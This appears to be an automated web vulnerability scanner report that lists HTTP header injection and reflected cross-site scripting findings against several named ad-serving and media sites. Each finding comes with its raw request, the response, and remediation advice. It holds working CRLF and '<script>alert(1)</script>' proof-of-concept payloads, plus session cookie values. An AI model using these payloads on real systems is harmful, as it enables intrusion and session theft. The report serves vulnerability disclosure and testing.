HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 56b52%0d%0ad5a67d15b17 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; A2=ekNy9Ytg0aPa0000820wsiff3a9Ytg03sY0000820wsifHY+9YcR07Hs0000820wshfgbE9YhW02WG0000820wshfUzq9Yf80bfZ0000o61wshf.ae9YeI06IX0000g410shg8.K9YtA06OJ0000820wsif.bD9YeI06IX0000820wsh; eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=056b52%0d%0ad5a67d15b17; F1=00UilH0003sY9QVZ; B2=71cT0820wsi7W4s0820wsi7I0D0820wsh7Qiy0820wsh6UT.0820wsi7Qiz0g410sh7CEh0o61wsh72xf0820wsh; u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; E2=07Hso61wsh0aPag210si084oE210sf09KD820wrZ08Y5g410s3066Ng20wsg0bcF820wse0aVX820wsd02Edw620sd07A8820wse0bFAm5xosh08wQu7xUse077Tg20wr+07RTg410sf03sYSJHqsi0abMm5xos507fto20ws502WGSIbqsh04gITybush09EZ820ws305meg410sf06IXPEbesh0apK820wrU0bfZo61wsh0bKdo41wsf04m4820wsg06+TnBVush07k1820wse05sM820wsc0bnAME2ysf06OJ820wsi09bwg210s9; C3=0uju820wsh0000200_0ugY820wsi0000004_0tUC820wsi0000080_0wt6820wsi000000w_0v51820wsh0000002_0vBTo61wsh000000g_0tyOo61wsh0001000_; u3=1; ActivityInfo=000nx2bhf%5f000nx5bhf%5f0008uqbhL%5f000g3dbdR%5f000jUQbis%5f000nx1bhf%5f; D3=0ugY00Mm820wsi0wt603tW820wsi0tUC00Mm820wsi0v51004H820wsh0tyO04UKo61wsh0vBT04UKo61wsh0uju00iZ820wsh;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload ff369%0d%0a82c1db4eb16 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; A2=ekNy9Ytg0aPa0000820wsiff3a9Ytg03sY0000820wsifHY+9YcR07Hs0000820wshfgbE9YhW02WG0000820wshfUzq9Yf80bfZ0000o61wshf.ae9YeI06IX0000g410shg8.K9YtA06OJ0000820wsif.bD9YeI06IX0000820wsh; eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=0ff369%0d%0a82c1db4eb16; F1=00UilH0003sY9QVZ; B2=71cT0820wsi7W4s0820wsi7I0D0820wsh7Qiy0820wsh6UT.0820wsi7Qiz0g410sh7CEh0o61wsh72xf0820wsh; u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; E2=07Hso61wsh0aPag210si084oE210sf09KD820wrZ08Y5g410s3066Ng20wsg0bcF820wse0aVX820wsd02Edw620sd07A8820wse0bFAm5xosh08wQu7xUse077Tg20wr+07RTg410sf03sYSJHqsi0abMm5xos507fto20ws502WGSIbqsh04gITybush09EZ820ws305meg410sf06IXPEbesh0apK820wrU0bfZo61wsh0bKdo41wsf04m4820wsg06+TnBVush07k1820wse05sM820wsc0bnAME2ysf06OJ820wsi09bwg210s9; C3=0uju820wsh0000200_0ugY820wsi0000004_0tUC820wsi0000080_0wt6820wsi000000w_0v51820wsh0000002_0vBTo61wsh000000g_0tyOo61wsh0001000_; u3=1; ActivityInfo=000nx2bhf%5f000nx5bhf%5f0008uqbhL%5f000g3dbdR%5f000jUQbis%5f000nx1bhf%5f; D3=0ugY00Mm820wsi0wt603tW820wsi0tUC00Mm820wsi0v51004H820wsh0tyO04UKo61wsh0vBT04UKo61wsh0uju00iZ820wsh;
The value of REST URL parameter 2 is copied into the Location response header. The payload b1cfe%0d%0a385bd7a08a7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /jaw/b1cfe%0d%0a385bd7a08a7/10/51087634/ HTTP/1.1 Host: www.accelacomm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 14:07:06 GMT Server: Apache/2.2.3 (CentOS) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=b1cfe 385bd7a08a7&Source_BC=10&Script=/LP/51087634/reg& Vary: Accept-Encoding Content-Length: 429 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload b8f4d%0d%0a75caad6ec0d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/b8f4d%0d%0a75caad6ec0d/51087634/ HTTP/1.1 Host: www.accelacomm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 14:07:09 GMT Server: Apache/2.2.3 (CentOS) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=00019830002630CION8PY4MR9KO__ciost_ppw&Source_BC=b8f4d 75caad6ec0d&Script=/LP/51087634/reg& Vary: Accept-Encoding Content-Length: 465 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 4 is copied into the Location response header. The payload 8aeeb%0d%0a72b7a6572e9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/8aeeb%0d%0a72b7a6572e9/ HTTP/1.1 Host: www.accelacomm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 14:07:13 GMT Server: Apache/2.2.3 (CentOS) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=00019830002630CION8PY4MR9KO__ciost_ppw&Source_BC=10&Script=/LP/8aeeb 72b7a6572e9/reg& Vary: Accept-Encoding Content-Length: 459 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 84af3%0d%0a1ba961655d8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /jaw/84af3%0d%0a1ba961655d8/1/51217035/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:02 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=84af3 1ba961655d8&Source_BC=1&Script=/LP/51217035/reg& Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 428
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 40b6a%0d%0acae5fdcb550 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /jaw/btob_smm_160/40b6a%0d%0acae5fdcb550/51217035/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:05 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_160&Source_BC=40b6a cae5fdcb550&Script=/LP/51217035/reg& Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 439
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 4 is copied into the Location response header. The payload 6060f%0d%0af949928b296 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /jaw/btob_smm_160/1/6060f%0d%0af949928b296/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:07 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_160&Source_BC=1&Script=/LP/6060f f949928b296/reg& Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 432
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload bd5a3%0d%0a512870eaac9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /jaw/bd5a3%0d%0a512870eaac9/1/51217035/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Referer: http://www.btobonline.com/section/blog-roundup Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:00 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=bd5a3 512870eaac9&Source_BC=1&Script=/LP/51217035/reg& Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 428
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 555c7%0d%0a14034e98e3e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /jaw/btob_smm_728/555c7%0d%0a14034e98e3e/51217035/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Referer: http://www.btobonline.com/section/blog-roundup Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:02 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_728&Source_BC=555c7 14034e98e3e&Script=/LP/51217035/reg& Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 439
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 4 is copied into the Location response header. The payload dae2d%0d%0a5e4e4802f7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /jaw/btob_smm_728/1/dae2d%0d%0a5e4e4802f7/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Referer: http://www.btobonline.com/section/blog-roundup Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:05 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_728&Source_BC=1&Script=/LP/dae2d 5e4e4802f7/reg& Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 431
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b6f72%0d%0a5c2db68553b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /jef/b6f72%0d%0a5c2db68553b/ HTTP/1.1 Host: www.accelacomm.com Proxy-Connection: keep-alive Referer: http://www.accelacommunications.com/index2/lp/evolve_video_strategy.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Svr=svr.regwa3; regid=57c7f943:12cec784a11:-3759.92
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 16 Dec 2010 13:18:02 GMT Server: Apache/2.2.9 (Fedora) Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=EMBED&Script=/LP/b6f72 5c2db68553b/reg&/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 390
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://reg.accelacomm.c ...[SNIP]...
2. Cross-site scripting (reflected)previous There are 437 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75089<script>alert(1)</script>444453bafa7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adam-services/api/media75089<script>alert(1)</script>444453bafa7/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1 Host: adam-service.app.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/json;charset=ISO-8859-1 Content-Length: 4481 Date: Thu, 16 Dec 2010 13:59:18 GMT
{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media75089<script>alert(1)</script>444453bafa7/getVideo] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.glo ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53df9<script>alert(1)</script>d5a0bd145b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adam-services/api/media/getVideo53df9<script>alert(1)</script>d5a0bd145b1?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1 Host: adam-service.app.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/json;charset=ISO-8859-1 Content-Length: 4481 Date: Thu, 16 Dec 2010 13:59:19 GMT
{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media/getVideo53df9<script>alert(1)</script>d5a0bd145b1] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.global.util. ...[SNIP]...
The value of the brightcoveId request parameter is copied into the HTML document as plain text between tags. The payload b297a<script>alert(1)</script>bee90c4c596 was submitted in the brightcoveId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adam-services/api/media/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId=b297a<script>alert(1)</script>bee90c4c596 HTTP/1.1 Host: adam-service.app.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/json;charset=ISO-8859-1 Date: Thu, 16 Dec 2010 13:59:09 GMT Content-Length: 11066
{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"Cannot convert [brightcoveId] parameter with values of [b297a<script>alert(1)</script>bee90c4c596] to [long] type!","stackTrace":[{"className":"com.aol.global.util.WebPageContext","methodName":"getParameter","fileName":"WebPageContext.java","lineNumber":330},{"className":"com.aol.global.util.WebPa ...[SNIP]...
The value of the version request parameter is copied into the HTML document as plain text between tags. The payload c2853<script>alert(1)</script>82d0c915ecc was submitted in the version parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adam-services/api/media/getVideo?version=1.0c2853<script>alert(1)</script>82d0c915ecc&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1 Host: adam-service.app.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/json;charset=ISO-8859-1 Content-Length: 4710 Date: Thu, 16 Dec 2010 13:58:59 GMT
{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[1.0c2853<script>alert(1)</script>82d0c915ecc] is not a valid version string!","stackTrace":[{"className":"com.aol.global.util.Version","methodName":"<init> ...[SNIP]...
The value of the adiframe|2.0|277|75593|1|246|target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9f878><script>alert(1)</script>1985d9d85ae was submitted in the adiframe|2.0|277|75593|1|246|target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?adiframe|2.0|277|75593|1|246|target=9f878><script>alert(1)</script>1985d9d85ae HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 263
The value of the adiframe|2.0|277|75593|1|246|target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a546f"><script>alert(1)</script>9db0ee5cd0e was submitted in the adiframe|2.0|277|75593|1|246|target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?adiframe|2.0|277|75593|1|246|target=_blank;a546f"><script>alert(1)</script>9db0ee5cd0e HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 235
2.7. http://adserver.adtech.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtech.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764c9"><script>alert(1)</script>3b8de120b8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?adiframe|2.0|277|75593|1|246|target=_blank;&764c9"><script>alert(1)</script>3b8de120b8c=1 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 238
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6238a'-alert(1)-'f9d6fc88a25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank?6238a'-alert(1)-'f9d6fc88a25=1 HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 276
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ddee'-alert(1)-'ae3f639f0a7 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
